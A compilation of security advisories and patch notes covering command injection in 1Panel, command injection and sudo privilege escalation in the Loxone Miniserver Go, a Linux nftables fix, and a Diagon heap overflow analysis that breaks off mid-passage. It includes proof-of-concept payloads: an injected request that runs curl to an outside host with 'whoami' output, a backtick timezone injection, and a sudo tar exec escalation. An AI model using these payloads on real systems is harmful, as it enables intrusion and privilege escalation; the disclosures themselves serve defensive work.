1Panel is an open source Linux server operation and maintenance management panel. Prior to version 1.3.6, an authenticated attacker can craft a malicious payload to achieve command injection when adding container repositories. The vulnerability has been fixed in v1.3.6.

**一、安装和升级****1.1 一键安装**

**CentOS/RHEL**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sh quick\_start.sh

**Ubuntu**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && sudo bash quick\_start.sh

**Debian**

curl -sSL https://resource.fit2cloud.com/1panel/package/quick\_start.sh -o quick\_start.sh && bash quick\_start.sh

**1.2 在线升级**

登录 1Panel Web 控制台，在页面右下角点击 **【检查更新】** 进行在线升级。

> 更多信息请查阅在线文档：https://1panel.cn/docs/

**二、更新日志****2.1 功能优化**

*   应用商店列表增加分页显示。 by @zhengkunwang223 in #1447
*   SSH 登录日志列表查询逻辑优化。 by @ssongliu in #1435

**2.2 问题修复**

*   修复了由于 docker 版本低导致应用无法正常操作的问题。 by @zhengkunwang223 in #1446
*   修复了执行备份根目录文件夹计划任务失败的问题。 by @ssongliu in #1444
*   修复了系统数据库文件无法正常读写时系统提示错误的问题。 by @ssongliu in #1438
*   修复了添加镜像仓库和进入容器终端存在命令注入的问题。 by @ssongliu in #1443
*   修复了设置容器镜像加速和私有仓库时由于空行导致 docker 无法正常启用的问题。 by @ssongliu in #1437

CVE-2023-36457: Release v1.3.6 · 1Panel-dev/1Panel

1Panel is an open source Linux server operation and maintenance management panel. Prior to version 1.3.6, an authenticated attacker can craft a malicious payloads to achieve command injection when entering the container terminal. The vulnerability has been fixed in v1.3.6.

**Package**

No package listed

**Affected versions**

<=v1.3.5

**Impact**

The authenticated attacker can craft a malicious payloads to achieve command injection when entering the container terminal.

1.  Vulnerability analysis.

    backend\app\api\v1\terminal.go#ContainerWsSsh
    

2.  vulnerability reproduction.

    GET /api/v1/containers/exec?cols=80&rows=24&containerid=/bin/bash||curl%20http://192.168.109.1:12345/`whoami`||&user=asd&command=/bin/bash HTTP/1.1
    Host: 192.168.109.152:40982
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Sec-WebSocket-Version: 13
    Origin: http://192.168.109.152:40982
    Sec-WebSocket-Key: cOEWTRgkjxVppuhzAfOUWQ==
    Connection: keep-alive, Upgrade
    Cookie: rem-username=admin; psession=a6bcab14-d426-4cfe-8635-533e88b6f75e
    Pragma: no-cache
    Cache-Control: no-cache
    Upgrade: websocket
    

3.  The successful execution of system commands.  
    

Affected versions: <= 1.3.5

**Patches**

The vulnerability has been fixed in v1.3.6.

**Workarounds**

It is recommended to upgrade the version to v1.3.6.

**References**

If you have any questions or comments about this advisory:

Open an issue in https://github.com/1Panel-dev/1Panel  
Email us at wanghe@fit2cloud.com

CVE-2023-36458: Command injection when entering the container terminal

The websocket configuration endpoint of the Loxone Miniserver Go Gen.2 before 14.1.5.9 allows remote authenticated administrators to inject arbitrary OS commands via the timezone parameter.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-012 Product: Miniserver Go Gen.2 Manufacturer: Loxone Affected Version(s): <14.0.3.28 Tested Version(s): 14.0.3.28, 13.1.11.17 Vulnerability Type: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') (CWE-78) Risk Level: Medium Solution Status: Fixed Manufacturer Notification: 2023-04-21 Solution Date: 2023-05-09 Public Disclosure: 2023-06-30 CVE Reference: CVE-2023-36622 Author of Advisory: Tobias Jäger, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Loxone Miniserver Go is a smart home hub. The manufacturer describes the product as follows (see \[1\]): "The Loxone Miniserver Go serves as central control unit for all kinds of automation tasks." Due to missing validation of user input, it is vulnerable to authenticated OS command injection. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The Loxone Miniserver Go is not validating user input when setting the timezone of the device. Since the timezone is set in a Linux shell context creating a symlink, the user can break out of the command and execute arbitrary OS commands. Executing a command in a shell context can be achieved by using backticks (\`). The timezone can only be modified when authenticated as an administrative user. Communicating with the Loxone Miniserver Go, a websocket connection needs to be established and cryptographic parameters need to be negotiated. This is described in "Communicating with the Loxone Miniserver" (see \[4\]). Commands sent to the authenticated WebSocket need to be encrypted in the way described in the paper. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Follow the instructions in "Communicating with the Loxone Miniserver"(see \[4\]) to establish a WebSocket connection and authenticate as an administrative user. Setting the timezone to "Europe/\`touch /lx/hacked;echo Vienna\`" will execute the OS command to create an empty file in the folder /lx named "hacked". Setting the timezone can be achieved by encrypting and sending the following command to the WebSocket: jdev/sys/setconfiguration/?json={"ip":0,"mask":16777215,"gateway":23505088, "dns1":23505088,"dns2":134744072,"mtu":0,"port-http":80,"port-ftp":21, "port-monitor":7777,"confLocalOnly":false,"msName":"SySS","host":"hostname", "ntp":"","timezone":"Europe/\`touch /lx/hacked;echo Vienna\`","externHost":"", "port-extHttp":0,"port-extHttps":0,"useProxy":false}' If the attack was successful, an empty file named "hacked" should be found in the folder reachable via FTP. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Install firmware version 14.1.5.9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-04-20: Vulnerability discovered 2023-04-21: Vulnerability reported to manufacturer 2023-05-09: Patch released by manufacturer 2023-06-30: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for the Loxone Miniserver Go https://www.loxone.com/dede/kb/miniserver-go/ \[2\] SySS Security Advisory SYSS-2023-012 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-012.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy \[4\] Communicating with the Loxone Miniserver https://www.loxone.com/dede/wp-content/uploads/sites/2/2022/06/1300\_Communicating-with-the-Miniserver.pdf ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Tobias Jäger of SySS GmbH. E-Mail: tobias.jaeger@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Tobias\_Jaeger.asc Key ID: 0xABF0CF2F4D0220F9 Key Fingerprint: 5C9F 5312 F37E B9AB E87B 1212 ABF0 CF2F 4D02 20F9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEXJ9TEvN+uavoexISq/DPL00CIPkFAmSdKcIACgkQq/DPL00C IPlgIRAAmVs9+YOlJI/Zayq0N0L02MahU1DBXNEDRWUDTCyfF4egLxREPJOokxyf KbhRFTqBIhtHah1yWbY6o3A5n38fLZ0nHvdly1N3ZmTQVHTqhZtPvYTlKNVj6xQn nlWd/Z4K3aauNo4hV+sodYEwyf/T6WIn2N7/wpfLh1GjvWMPoo2ANIWaeHwjWVZD 5nzgLdrCRROCATsgwzIPLDP0DOXcFC/4Yccz8rGKCtJTVdGjEyXu8d+IrCIBStsI j/KMAmKsDfOagie5HCZWckZZ1KlEjusPUFZa2ZHe51OX4Joqhb9RLntWdTYLwn0O cMpzqPRoa2N2eLWcJyYLzGquhsew1n0iRHCzH9Hu/Q4aU7YxNhsb6oOVZEA1Pmg9 Og1EJEwjO80qq7A8FrxlKfC+ZEvNy9C66TZIQbhhZ+CDFTWMdJRAPFJJ0kDUaf7z u26WnwtbDTNroMIlSoNqpQKkRbavPcqrtRqRYCkHmunS5DsfeEQhQkpy5aNsDnYy TsXPCitoBtNBlIwUjTYHokxMZ9hkPqMyyuIylMZpB11SKsqpENtfLqJRPhKUVBdi mrKvqntconlVRwV9BZanrkxkySvhrl7s5kWVukmc5TLr7T5Rn/MuQx7ShZxU6iFn 07vhXTkPUE6os4DCWsXtgR5dAwG5T8asiqtSb+R+3Axj6nRLD0Q= =hxVd -----END PGP SIGNATURE-----

CVE-2023-36622

Loxone Miniserver Go Gen.2 through 14.0.3.28 allows an authenticated operating system user to escalate privileges via the Sudo configuration. This allows the elevated execution of binaries without a password requirement.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ﻿Advisory ID: SYSS-2023-004 Product: Miniserver Go Gen.2 Manufacturer: Loxone Affected Version(s): <14.0.3.28 Tested Version(s): 14.0.3.28, 13.1.11.17 Vulnerability Type: Execution with Unnecessary Privileges (CWE-250) Risk Level: Low Solution Status: Open Manufacturer Notification: 2023-04-19 Solution Date: tba Public Disclosure: 2023-06-30 CVE Reference: CVE-2023-36624 Author of Advisory: Tobias Jäger, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Loxone Miniserver Go is a smart home hub. The manufacturer describes the product as follows (see \[1\]): "The Loxone Miniserver Go serves as central control unit for all kinds of automation tasks." Due to a misconfiguration of the sudoers file, it is vulnerable to a local privilege escalation. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The Linux-based firmware uses the user "lx" as a low-privileged user. Sudo is used to execute commands with higher privileges. The user "lx" is granted these rights even without the need to insert the user's password for several binaries. Some of these binaries allow the execution of code, like the archive tool tar. The user "lx" is allowed to execute the following binaries with root privileges without the need of entering their password: lx ALL=NOPASSWD: /usr/sbin/dumpe2fs -h /dev/mmcblk0p6, /usr/bin/ntpdate \*, /usr/bin/lsof, \\ /usr/bin/tee /proc/sys/vm/drop\_caches, /usr/bin/tee -a /var/log/\*, \\ /usr/bin/openssl \*, /usr/bin/tar \*, \\ /usr/bin/systemctl restart systemd-networkd.service, \\ /usr/bin/updateflash /dev/mtd5 0x0 \*, /usr/bin/systemctl reboot, \\ /usr/bin/systemctl restart pure-ftpd.service, \\ /usr/bin/systemctl stop starthomekit.service, \\ /usr/bin/systemctl restart starthomekit.service, \\ /usr/bin/systemctl restart avahi-daemon, \\ /usr/bin/miniserverinit applytzdata \*, \\ /usr/bin/eebus, /usr/bin/ssh\*, /usr/bin/ln \*, /usr/bin/journalctl \*, /usr/bin/tee /var/log/\*, \\ /usr/bin/hostnamectl \*, /usr/bin/killall \*, \\ /usr/bin/chmod 644 /etc/factory/\*, \\ /usr/bin/systemctl is-active --quiet \*, \\ /usr/bin/cat /root/.ssh/known\_hosts For example, /usr/bin/tar can be used to execute arbitrary system commands and therefore escalate privileges to the root user. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): With the following line, the user "lx" can execute the whoami command in the context of the root user: sudo tar -cf /dev/null /dev/null --checkpoint=1 -checkpoint-action=exec="whoami" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: - - ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-01-19: Vulnerability discovered 2023-04-19: Vulnerability reported to manufacturer tba: Patch released by manufacturer 2023-06-30: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for the Loxone Miniserver Go https://www.loxone.com/dede/kb/miniserver-go/ \[2\] SySS Security Advisory SYSS-2023-004 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-004.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Tobias Jäger of SySS GmbH. E-Mail: tobias.jaeger@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Tobias\_Jaeger.asc Key ID: 0xABF0CF2F4D0220F9 Key Fingerprint: 5C9F 5312 F37E B9AB E87B 1212 ABF0 CF2F 4D02 20F9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEXJ9TEvN+uavoexISq/DPL00CIPkFAmSdKeQACgkQq/DPL00C IPkboQ//aOBNlO7FCXTawgWoRXopVafie3zM1C/GgKt5cQNFqwmLNi8PB+3u6aO0 K2n4RtwCv7UYbpuV85nYe77OB4ApXQ7h0V2jRGzrekYGWOTZURsMfQ9EOtQfz6KX eehmMYlgLP1TOU96MaS9R95sxujkIg2hKZAEFrWmz2yq8q6aL9uwkye3FttXl9mx LKxP2CCKnzxmPezT9MyIdpOkVPnBn3uZQ2JvTrEe7NatTKHXqE1E72ZI/ur7X7D9 TCyBIr7ETGetHUqW/zFLNriruwjYilXiXahDV7jxwjOb+RtVv3MhkwVpyRjs1cOx QNSHij+Myspoqryly7XjOn7B5MNvaQ0mSqu0xtavnIf9XtVoLQMVXyZN0tWgEDD6 iEBBdf8QM2rb1ce8Q+2UAQDFUkCCKtLL6Q0q/Swn4I7bG/Vm+MrDkD0k1MAdX6Rt ukSU6+xFNbtT4zKcPdZCXTRk/aAZ9fQN1UATF8OkV1psGxEgXRZuleuLugt5c6+M Ub7qGklBYq7OVnv9c54L9HXpLOTOX6hN+5uhnc3b1+SIN3U5YAALkfWO0b30t8Yr ZC+XyrNcszTo7BqzO+/SRlHBAgigqoE7vNq74HV1o2T6MeYDZLWxF8RKTtJ9InpQ n3RRYcrIvKAUHYRH12LodTXUMB6WLQAEn7Nj4+ofhiNdN0YoRBU= =ev9p -----END PGP SIGNATURE-----

CVE-2023-36624

Linux Kernel nftables Use-After-Free Local Privilege Escalation Vulnerability; `nft_chain_lookup_byid()` failed to check whether a chain was active and CAP_NET_ADMIN is in any user or network namespace

\* **\[PATCH\] netfilter: nf\_tables: do not ignore genmask when looking up chain by id**
**@ 2023-07-05 12:12 Thadeu Lima de Souza Cascardo**
  2023-07-05 12:16 \` Florian Westphal
  0 siblings, 1 reply; 2+ messages in thread
From: Thadeu Lima de Souza Cascardo @ 2023-07-05 12:12 UTC (permalink / raw)
  To: netfilter-devel; **+Cc:** cascardo, netdev, Pablo Neira Ayuso

When adding a rule to a chain referring to its ID, if that chain had been
deleted on the same batch, the rule might end up referring to a deleted
chain.

This will lead to a WARNING like following:

\[   33.098431\] ------------\[ cut here \]------------
\[   33.098678\] WARNING: CPU: 5 PID: 69 at net/netfilter/nf\_tables\_api.c:2037 nf\_tables\_chain\_destroy+0x23d/0x260
\[   33.099217\] Modules linked in:
\[   33.099388\] CPU: 5 PID: 69 Comm: kworker/5:1 Not tainted 6.4.0+ #409
\[   33.099726\] Workqueue: events nf\_tables\_trans\_destroy\_work
\[   33.100018\] RIP: 0010:nf\_tables\_chain\_destroy+0x23d/0x260
\[   33.100306\] Code: 8b 7c 24 68 e8 64 9c ed fe 4c 89 e7 e8 5c 9c ed fe 48 83 c4 08 5b 41 5c 41 5d 41 5e 41 5f 5d 31 c0 89 c6 89 c7 c3 cc cc cc cc <0f> 0b 48 83 c4 08 5b 41 5c 41 5d 41 5e 41 5f 5d 31 c0 89 c6 89 c7
\[   33.101271\] RSP: 0018:ffffc900004ffc48 EFLAGS: 00010202
\[   33.101546\] RAX: 0000000000000001 RBX: ffff888006fc0a28 RCX: 0000000000000000
\[   33.101920\] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000000
\[   33.102649\] RBP: ffffc900004ffc78 R08: 0000000000000000 R09: 0000000000000000
\[   33.103018\] R10: 0000000000000000 R11: 0000000000000000 R12: ffff8880135ef500
\[   33.103385\] R13: 0000000000000000 R14: dead000000000122 R15: ffff888006fc0a10
\[   33.103762\] FS:  0000000000000000(0000) GS:ffff888024c80000(0000) knlGS:0000000000000000
\[   33.104184\] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
\[   33.104493\] CR2: 00007fe863b56a50 CR3: 00000000124b0001 CR4: 0000000000770ee0
\[   33.104872\] PKRU: 55555554
\[   33.104999\] Call Trace:
\[   33.105113\]  <TASK>
\[   33.105214\]  ? show\_regs+0x72/0x90
\[   33.105371\]  ? \_\_warn+0xa5/0x210
\[   33.105520\]  ? nf\_tables\_chain\_destroy+0x23d/0x260
\[   33.105732\]  ? report\_bug+0x1f2/0x200
\[   33.105902\]  ? handle\_bug+0x46/0x90
\[   33.106546\]  ? exc\_invalid\_op+0x19/0x50
\[   33.106762\]  ? asm\_exc\_invalid\_op+0x1b/0x20
\[   33.106995\]  ? nf\_tables\_chain\_destroy+0x23d/0x260
\[   33.107249\]  ? nf\_tables\_chain\_destroy+0x30/0x260
\[   33.107506\]  nf\_tables\_trans\_destroy\_work+0x669/0x680
\[   33.107782\]  ? mark\_held\_locks+0x28/0xa0
\[   33.107996\]  ? \_\_pfx\_nf\_tables\_trans\_destroy\_work+0x10/0x10
\[   33.108294\]  ? \_raw\_spin\_unlock\_irq+0x28/0x70
\[   33.108538\]  process\_one\_work+0x68c/0xb70
\[   33.108755\]  ? lock\_acquire+0x17f/0x420
\[   33.108977\]  ? \_\_pfx\_process\_one\_work+0x10/0x10
\[   33.109218\]  ? do\_raw\_spin\_lock+0x128/0x1d0
\[   33.109435\]  ? \_raw\_spin\_lock\_irq+0x71/0x80
\[   33.109634\]  worker\_thread+0x2bd/0x700
\[   33.109817\]  ? \_\_pfx\_worker\_thread+0x10/0x10
\[   33.110254\]  kthread+0x18b/0x1d0
\[   33.110410\]  ? \_\_pfx\_kthread+0x10/0x10
\[   33.110581\]  ret\_from\_fork+0x29/0x50
\[   33.110757\]  </TASK>
\[   33.110866\] irq event stamp: 1651
\[   33.111017\] hardirqs last  enabled at (1659): \[<ffffffffa206a209>\] \_\_up\_console\_sem+0x79/0xa0
\[   33.111379\] hardirqs last disabled at (1666): \[<ffffffffa206a1ee>\] \_\_up\_console\_sem+0x5e/0xa0
\[   33.111740\] softirqs last  enabled at (1616): \[<ffffffffa1f5d40e>\] \_\_irq\_exit\_rcu+0x9e/0xe0
\[   33.112094\] softirqs last disabled at (1367): \[<ffffffffa1f5d40e>\] \_\_irq\_exit\_rcu+0x9e/0xe0
\[   33.112453\] ---\[ end trace 0000000000000000 \]---

This is due to the nft\_chain\_lookup\_byid ignoring the genmask. After this
change, adding the new rule will fail as it will not find the chain.

Fixes: 837830a4b439 ("netfilter: nf\_tables: add NFTA\_RULE\_CHAIN\_ID attribute")
Cc: stable@vger.kernel.org
Reported-by: Mingi Cho of Theori working with ZDI
Signed-off-by: Thadeu Lima de Souza Cascardo <cascardo@canonical.com>
---
 net/netfilter/nf\_tables\_api.c | 11 +++++++----
 1 file changed, 7 insertions(+), 4 deletions(-)

diff --git a/net/netfilter/nf\_tables\_api.c b/net/netfilter/nf\_tables\_api.c
index 9573a8fcad79..3701493e5401 100644
--- a/net/netfilter/nf\_tables\_api.c
+++ b/net/netfilter/nf\_tables\_api.c
@@ -2694,7 +2694,7 @@ static int nf\_tables\_updchain(struct nft\_ctx \*ctx, u8 genmask, u8 policy,
 
 static struct nft\_chain \*nft\_chain\_lookup\_byid(const struct net \*net,
 					       const struct nft\_table \*table,
\-					       const struct nlattr \*nla)
+					       const struct nlattr \*nla, u8 genmask)
 {
 	struct nftables\_pernet \*nft\_net = nft\_pernet(net);
 	u32 id = ntohl(nla\_get\_be32(nla));
@@ -2705,7 +2705,8 @@ static struct nft\_chain \*nft\_chain\_lookup\_byid(const struct net \*net,
 
 		if (trans->msg\_type == NFT\_MSG\_NEWCHAIN &&
 		    chain->table == table &&
\-		    id == nft\_trans\_chain\_id(trans))
+		    id == nft\_trans\_chain\_id(trans) &&
+		    nft\_active\_genmask(chain, genmask))
 			return chain;
 	}
 	return ERR\_PTR(-ENOENT);
@@ -3809,7 +3810,8 @@ static int nf\_tables\_newrule(struct sk\_buff \*skb, const struct nfnl\_info \*info,
 			return -EOPNOTSUPP;
 
 	} else if (nla\[NFTA\_RULE\_CHAIN\_ID\]) {
\-		chain = nft\_chain\_lookup\_byid(net, table, nla\[NFTA\_RULE\_CHAIN\_ID\]);
+		chain = nft\_chain\_lookup\_byid(net, table, nla\[NFTA\_RULE\_CHAIN\_ID\],
+					      genmask);
 		if (IS\_ERR(chain)) {
 			NL\_SET\_BAD\_ATTR(extack, nla\[NFTA\_RULE\_CHAIN\_ID\]);
 			return PTR\_ERR(chain);
@@ -10502,7 +10504,8 @@ static int nft\_verdict\_init(const struct nft\_ctx \*ctx, struct nft\_data \*data,
 						 genmask);
 		} else if (tb\[NFTA\_VERDICT\_CHAIN\_ID\]) {
 			chain = nft\_chain\_lookup\_byid(ctx->net, ctx->table,
\-						      tb\[NFTA\_VERDICT\_CHAIN\_ID\]);
+						      tb\[NFTA\_VERDICT\_CHAIN\_ID\],
+						      genmask);
 			if (IS\_ERR(chain))
 				return PTR\_ERR(chain);
 		} else {
-- 
2.34.1

^ permalink raw reply related	\[**flat**|nested\] 2+ messages in thread

\* **Re: \[PATCH\] netfilter: nf\_tables: do not ignore genmask when looking up chain by id**
  2023-07-05 12:12 \[PATCH\] netfilter: nf\_tables: do not ignore genmask when looking up chain by id Thadeu Lima de Souza Cascardo
**@ 2023-07-05 12:16 \` Florian Westphal**
  0 siblings, 0 replies; 2+ messages in thread
From: Florian Westphal @ 2023-07-05 12:16 UTC (permalink / raw)
  To: Thadeu Lima de Souza Cascardo; **+Cc:** netfilter-devel, netdev, Pablo Neira Ayuso

Thadeu Lima de Souza Cascardo <cascardo@canonical.com> wrote:
\> When adding a rule to a chain referring to its ID, if that chain had been
> deleted on the same batch, the rule might end up referring to a deleted
> chain.
Reviewed-by: Florian Westphal <fw@strlen.de>

^ permalink raw reply	\[**flat**|nested\] 2+ messages in thread

end of thread, other threads:\[~2023-07-05 12:16 UTC | newest\]

**Thread overview:** 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2023-07-05 12:12 \[PATCH\] netfilter: nf\_tables: do not ignore genmask when looking up chain by id Thadeu Lima de Souza Cascardo
2023-07-05 12:16 \` Florian Westphal

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).

CVE-2023-31248: do not ignore genmask when looking up chain by id

Linux Kernel nftables Out-Of-Bounds Read/Write Vulnerability; nft_byteorder poorly handled vm register contents when CAP_NET_ADMIN is in any user or network namespace

CVE-2023-35001: prevent OOB access in nft_byteorder_eval

A heap-based buffer overflow vulnerability exists in the Sequence::DrawText functionality of Diagon v1.0.139. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**SUMMARY**

A heap-based buffer overflow vulnerability exists in the Sequence::DrawText functionality of Diagon v1.0.139. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Diagon v1.0.139

**PRODUCT URLS**

Diagon - https://github.com/ArthurSonzogni/Diagon

**CVSSv3 SCORE**

8.4 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-122 - Heap-based Buffer Overflow

**DETAILS**

Diagon is an interpreter that translates markdown in several formats: latex, planar graph, table, tree and many others.

The Diagon interpreter translates a markdown text sequence diagram to a graphical sequence diagram. For instance, the input could look like this:

    Left -> Right: Message1
    Left <- Right: Message2
    

and the sequence diagram would result in:

     ┌────┐  ┌─────┐
     │Left│  │Right│
     └─┬──┘  └──┬──┘
       │        │
       │Message1│
       │───────>│
       │        │
       │Message2│
       │<───────│
     ┌─┴──┐  ┌──┴──┐
     │Left│  │Right│
     └────┘  └─────┘
    

The input will be parsed and will eventually reach the Sequence::UniformizeActors function:

    void Sequence::UniformizeActors() {
      [...]
    
      for (auto& message : messages) {
        for (auto& actor : {message.from, message.to}) {
          if (!actor_index.count(actor)) {
            actor_index[actor] = actors.size();
            Actor a;
            a.name = actor;
            actors.push_back(a);
          }
        }
      }
    }
    

This function will parse the actors in each message in messages, which consist of each row of the sequence diagram text. The actors are the sender and the receiver. In the example above, the actors are “Left” and “Right.” The function populates the actors vector and associates, in the actor_index map, the name of the actor with the number of elements in the actors vector at the creation time of the entry. This essentially can be considered an index starting from 0 and increasing with each new actor.

Eventually the Sequence::LayoutComputeActorsPositions function will be called to calculate the position of the various actors in the sequence diagram:

    void Sequence::LayoutComputeActorsPositions() {
      [...]
      
      for (auto& message : messages) {
        ActorSpace space{actor_index[message.from],  //
                         actor_index[message.to],    //
                         message.width + 1};         //
        if (space.a > space.b)
          std::swap(space.a, space.b);
        spaces.push_back(space);
      }
    
      if (actors.size() != 0)
        actors[0].center = actors[0].name.size() / 2 + 1;
    
      bool modified = true;
      int i = 0;
      while (modified) {
        modified = false;
        for (const ActorSpace& s : spaces) {
          if (actors[s.b].center - actors[s.a].center < s.space) {                                                  [1]
            actors[s.b].center = actors[s.a].center + s.space;
            modified = true;
          }
        }
        if (i++ > 500) {                                                                                            [2]
          std::cout << "Something went wrong!" << std::endl;
          break;
        }
      }
    
      for (auto& actor : actors) {                                                                                  [3]
        actor.left = actor.center - actor.name.size() / 2 - actor.name.size() % 2;
        actor.right = actor.left + actor.name.size() + 2;
      }
    }
    

Then, using the calculated positions, a Screen class is instantiated:

    std::string Sequence::Draw() {
        // Estimate output dimension.
        int width = actors.back().right;
        int height = 0;
        for (const Message& message : messages) {
          height = std::max(height, message.bottom);
        }
        height += 4;
    
        Screen screen(width, height);
    
        for (auto& actor : actors)
          actor.Draw(screen, height);
    
        for (auto message : messages)
          message.Draw(screen);
    
        if (ascii_only_)
          screen.ASCIIfy(0);
        return screen.ToString();
    }
    

The Screen class contains the lines_ matrix where the graphical sequence diagram is going to be written. This matrix takes into consideration the various sizes involved: the actors, the arrows, the messages, etc. Eventually the names of the actors and the messages between the them will be “drawn.” For each of these texts the Screen::DrawText function will be called:

    void Screen::DrawText(int x, int y, std::wstring_view text) {
        for (auto& c : text)
            lines_[y][x++] = c;                                                                                     [4]
    } Here `lines_` is the member of the `Screen` class instantiated in `Sequence::Draw`.
    

Sequence::LayoutComputeActorsPositions uses a variable called spaces. This is a vector dictating the minimum spaces between two actors. The spaces vector contains various instances of the ActorSpace struct. This struct contains two indexes for specifying which actors are involved: the ones stored in the actor_index map, and an integer value that represents the minimum spaces required between the two actors. For each message, one struct is created, using the minimum space required to write the message between the two actors. The spaces vector also contains the spaces required for each pair of adjacent actors. Each actor has three parameters to satisfy this space requirements: left, center and right. These dictate the position of each actor in the diagram.

To simplify the code explanation following, we are going to omit that the spaces array has the distances also for the adjacent actors and consider only the spaces in relationship to the messages and their sender and receiver actors. The Sequence::LayoutComputeActorsPositions function executes a while loop to modifying the actors positions based on the content of spaces. The while is executed until either the condition actors[s.b].center - actors[s.a].center < s.space, at [1], is false, meaning that the space between the two actors is enough for the message to be drawn with no modification of the actors positions, or the while has been executed 500 times, a check is executed at [2], and something was wrong, as suggested by the print.

This function has a bug, which can lead to a heap buffer overflow. Let’s take for example the following representation of a sequence diagram:

      A -> A:Message
    

In this example the sender and the receiver are the same actor, meaning that the index of the two will be equal; in this example, 0. The condition at [1], actors[s.b].center - actors[s.a].center < s.space for this example, can be simplified as actors[0].center - actors[0].center < s.space. Because the portion on the left is always equal to 0, this condition is always true. This means that the actors[s.b].center value is always updated without progress for making the condition at [1] false. Furthermore, also at [3], the actor’s left and right positions are updated, increasing their value.

Eventually the code at [4] is reached. The variable lines_ has a width and a height that are based on the positions calculated for the actors and the messages. The problem is that, even if the while in Sequence::LayoutComputeActorsPositions has been executed 500 times, no progress on changing the position of the actor to accommodate the message has been made. Indeed, the actor’s center, left and right values increased substantially, but the distance between the values did not. In this example the only actor present has the following position values:

      (gdb) p actors
